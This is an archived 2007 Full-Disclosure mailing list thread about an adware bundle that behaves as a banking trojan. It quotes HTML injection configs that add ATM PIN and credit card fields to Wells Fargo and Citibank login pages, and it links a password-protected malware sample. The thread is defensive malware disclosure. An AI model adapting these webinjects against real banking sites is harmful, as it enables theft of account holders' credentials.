OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Full-disclosure] Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

From: Net Tech (net.tech11gmail.com)
Date: Tue Mar 13 2007 - 12:36:10 CDT


Why is this "genius" sending virus infected attachments to the list?
The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"...
it steals passwords and logs keystrokes entered into certain financial Web
sites.

On 3/12/07, Thierry Zoller <Thierryzoller.lu> wrote:
>
> Dear list,
>
> Whoever deals with these poeple and thinks they are a benign Adware
> company (and thus spreads their bundles.
>
> Check this :
> Ignoring the fact that they basicaly install a Rootkit, I attached a
> few files I reversed, they install a DLL that does not directly KEYLOG
> your
> banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking
> page
> asking you to enter more details (like PIN, Magic Password etc), then
> capture that data and transmit it (I did no further investigation)
>
> http://secdev.zoller.lu/system32.zip
> Pass: 123
>
> I am disgusted. They even created their own XML parser for this ...
>
> An extract of HTML code they inject :
> -------------------------------------
> <inject
> url="wellsfargo"
> before="name=userid autocomplete='off'></DIV>"
> what="
> <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
> id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin
> autocomplete='off'></SPAN></DIV>
> "
> block="alt=Go"
> check="pin"
> quan="4"
> content="d"
> >
> </inject>
> ------------------------------------
>
> Attached the main files (pass 123), feel free to add this as HIPS or
> whatever
> signatures, those interested in a complete reversal can contact me
> to receive the EXE in question.
>
> I have no more time feel free to dig deeper.
>
>
> I especialy liked this :
> ------------------------
> <inject
> url="citibank.com"
> <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
> prevent fraud enter your credit card information please:</SPAN></TD></TR>
>
>
> Puke..
>
> --
> http://secdev.zoller.lu
> Thierry Zoller
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/